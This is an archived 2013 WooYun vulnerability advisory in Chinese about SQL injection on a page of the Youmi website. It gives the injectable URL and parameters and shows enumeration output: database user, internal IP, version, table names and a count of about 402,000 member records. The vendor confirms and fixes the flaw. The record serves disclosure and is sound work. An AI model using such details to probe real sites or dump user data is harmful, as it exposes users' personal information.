当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023076

漏洞标题:优米网sql注射漏洞(40余万会员详细信息可脱裤)

相关厂商:优米网

漏洞作者: z@cx

提交时间:2013-05-04 16:52

修复时间:2013-06-18 16:52

公开时间:2013-06-18 16:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-04: 细节已通知厂商并且等待厂商处理中
2013-05-04: 厂商已经确认,细节仅向厂商公开
2013-05-14: 细节向核心白帽子及相关领域专家公开
2013-05-24: 细节向普通白帽子公开
2013-06-03: 细节向实习白帽子公开
2013-06-18: 细节向公众公开

简要描述:

优米网sql注射漏洞(40余万会员信息可脱裤)

详细说明:

http://mili.umiwi.com/profile/?short_name=187528&type=9&vid=26361


Current User: 	mili_online@192.168.19.166
Sql Version: 	5.5.15-log
Current DB: 	mili_online
System User: 	mili_online@192.168.19.166
Host Name: 	DB_1
Installation dir: 	/opt/mysql
DB User: 	'mili_online'@'192.168.19.166'
Data Bases: 	information_schema
		mili_online
		test


tables

adminlog	
announcement	
article	
articletag	
audience	
eduinfo	
favorite	
feedback	
growup	
hmrlee	
hyonghe	
id_genter	
img	
milier	
newqa	
notes	
report	
sessions	
setting	
tag	
tutor_inactive	
tutor_record	
tutor_video	
tutors	
tutortags	
uc_members
userinfo	
vipalbum	
visit	
workinfo


漏洞证明:

402809名会员信息泄漏额。。。

Count(*) of mili_online.uc_members is 402809

修复方案:

过滤额!!!!

版权声明:转载请注明来源 z@cx@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-05-04 18:46

厂商回复:

感谢z@cx 的反馈,问题已经解决!

最新状态:

暂无